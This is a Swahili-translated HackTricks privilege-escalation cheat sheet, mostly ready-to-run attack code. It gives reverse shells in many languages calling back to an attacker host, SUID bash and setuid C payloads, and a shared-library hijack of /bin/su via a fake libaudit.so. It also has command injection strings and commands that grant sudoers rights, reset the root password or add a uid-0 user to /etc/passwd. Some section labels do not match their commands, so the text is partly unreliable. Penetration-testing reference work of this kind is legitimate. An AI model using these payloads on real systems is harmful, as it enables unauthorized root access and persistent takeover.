11 KiB
Mipangilio ya kutekeleza
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
- Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF? Angalia MPANGO WA KUJIUNGA!
- Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
- Pata swag rasmi ya PEASS & HackTricks
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuatilie kwenye Twitter 🐦@carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.
Bash
cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
C
Payloads to Execute
Shell
A shell payload is a command or script that is executed in a shell environment. It allows an attacker to gain remote access to a target system and execute commands.
Bash
bash -c 'command'
Python
python -c 'import os; os.system("command")'
Perl
perl -e 'system("command")'
Ruby
ruby -e 'system("command")'
PHP
php -r 'system("command");'
Node.js
node -e 'require("child_process").exec("command", function(error, stdout, stderr) { console.log(stdout); });'
Reverse Shell
A reverse shell payload is used to establish a connection from the target system to the attacker's machine. This allows the attacker to gain remote access to the target system.
Bash
bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",attacker-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'use Socket;$i="attacker-ip";$p=attacker-port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
ruby -rsocket -e'f=TCPSocket.open("attacker-ip",attacker-port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
PHP
php -r '$sock=fsockopen("attacker-ip",attacker-port);exec("/bin/sh -i <&3 >&3 2>&3");'
Netcat
nc -e /bin/sh attacker-ip attacker-port
Socat
socat tcp-connect:attacker-ip:attacker-port exec:/bin/sh,pty,stderr,setsid,sigint,sane
File Upload
A file upload payload is used to upload a file to a target system. This can be useful for uploading malicious files or tools to the target system.
Curl
curl -F "file=@/path/to/file" http://target-ip/upload.php
Wget
wget --post-file=/path/to/file http://target-ip/upload.php
Netcat
nc target-ip target-port < /path/to/file
SCP
scp /path/to/file user@target-ip:/path/to/destination
FTP
ftp target-ip
ftp> put /path/to/file
ftp> quit
TFTP
tftp target-ip
tftp> put /path/to/file
tftp> quit
Command Injection
A command injection payload is used to execute arbitrary commands on a target system by injecting malicious commands into vulnerable input fields.
Basic Command Injection
command; malicious-command
Command Injection with Substitution
command; $(malicious-command)
Command Injection with Encapsulation
command; `malicious-command`
Command Injection with Newline
command%0Amalicious-command
Command Injection with Pipe
command | malicious-command
Command Injection with Semicolon
command && malicious-command
Command Injection with Double Ampersand
command || malicious-command
Command Injection with Double Pipe
command |& malicious-command
Command Injection with Variable
command; echo $malicious-command
Command Injection with Subshell
command; (malicious-command)
Command Injection with Process Substitution
command; <(malicious-command)
Command Injection with Command Substitution
command; $(malicious-command)
Command Injection with Arithmetic Substitution
command; $((malicious-command))
Command Injection with Filename
command; $(cat malicious-file)
Command Injection with File Descriptor
command; cat <&3
Command Injection with Input Redirection
command; cat <<< malicious-command
Command Injection with Output Redirection
command; cat > malicious-file
Command Injection with Command Substitution and Output Redirection
command; $(malicious-command) > malicious-file
Command Injection with Command Substitution and Input Redirection
command; $(malicious-command) <<< malicious-input
Command Injection with Command Substitution and Output Redirection to File Descriptor
command; $(malicious-command) > /dev/tcp/attacker-ip/attacker-port
Command Injection with Command Substitution and Output Redirection to Reverse Shell
command; $(malicious-command) > /dev/tcp/attacker-ip/attacker-port 0<&1 2>&1
//gcc payload.c -o payload
int main(void){
setresuid(0, 0, 0); //Set as user suid user
system("/bin/sh");
return 0;
}
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}
// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) {
char *const paramList[10] = {"/bin/bash", "-p", NULL};
const int id = 1000;
setresuid(id, id, id);
execve(paramList[0], paramList, NULL);
return 0;
}
Kubadilisha faili ili kuongeza mamlaka
Faili za Kawaida
- Ongeza mtumiaji na nenosiri kwenye /etc/passwd
- Badilisha nenosiri ndani ya /etc/shadow
- Ongeza mtumiaji kwenye sudoers kwenye /etc/sudoers
- Tumia docker kupitia soketi ya docker, kawaida kwenye /run/docker.sock au /var/run/docker.sock
Kubadilisha maktaba
Angalia maktaba inayotumiwa na baadhi ya binary, katika kesi hii /bin/su:
ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
Katika kesi hii, jaribu kujifanya kuwa /lib/x86_64-linux-gnu/libaudit.so.1.
Kwa hivyo, angalia kazi za maktaba hii zinazotumiwa na binary ya su:
objdump -T /bin/su | grep audit
0000000000000000 DF *UND* 0000000000000000 audit_open
0000000000000000 DF *UND* 0000000000000000 audit_log_user_message
0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message
000000000020e968 g DO .bss 0000000000000004 Base audit_fd
Alama za audit_open, audit_log_acct_message, audit_log_acct_message na audit_fd zinaweza kuwa kutoka kwa maktaba ya libaudit.so.1. Kwa kuwa libaudit.so.1 itafutwa na maktaba mbaya ya pamoja, alama hizi lazima ziwe zipo katika maktaba mpya ya pamoja, vinginevyo programu haitaweza kupata alama na itafunga.
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c
int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;
void inject()__attribute__((constructor));
void inject()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
Sasa, kwa kuita /bin/su tu, utapata kikao kama mtumiaji mkuu.
Skrini
Je, unaweza kufanya mtumiaji mkuu afanye kitu?
www-data kuwa sudoers
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Badilisha nenosiri la root
Ili kubadilisha nenosiri la root, unaweza kutumia amri ifuatayo:
sudo passwd root
Amri hii itakuruhusu kubadilisha nenosiri la mtumiaji wa root kwa mfumo wako. Unapaswa kuwa na ruhusa ya sudo ili kuweza kutumia amri hii. Baada ya kutekeleza amri, utaulizwa kuingiza nenosiri jipya la root mara mbili kwa uthibitisho. Kisha, nenosiri la root litabadilishwa na kuwa jipya.
echo "root:hacked" | chpasswd
Ongeza mtumiaji mpya wa root kwenye /etc/passwd
echo 'newrootuser:$6$SALT$ENCRYPTEDPASSWORD:0:0:root:/root:/bin/bash' >> /etc/passwd
Hii itaongeza mtumiaji mpya wa root kwenye faili ya /etc/passwd. Mtumiaji huyu atakuwa na jina la "newrootuser" na nywila iliyosimbwa itahitajika. Nywila inapaswa kusimbwa kwa kutumia salt na algorithm ya kusimbwa kama vile SHA-512. Mtumiaji huyu atakuwa na ID ya mtumiaji na ID ya kikundi cha 0, na anaweza kufikia saraka ya /root na kutumia shell ya /bin/bash.
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
- Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF? Angalia MPANGO WA KUJIUNGA!
- Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
- Pata bidhaa rasmi za PEASS & HackTricks
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuatilie kwenye Twitter 🐦@carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.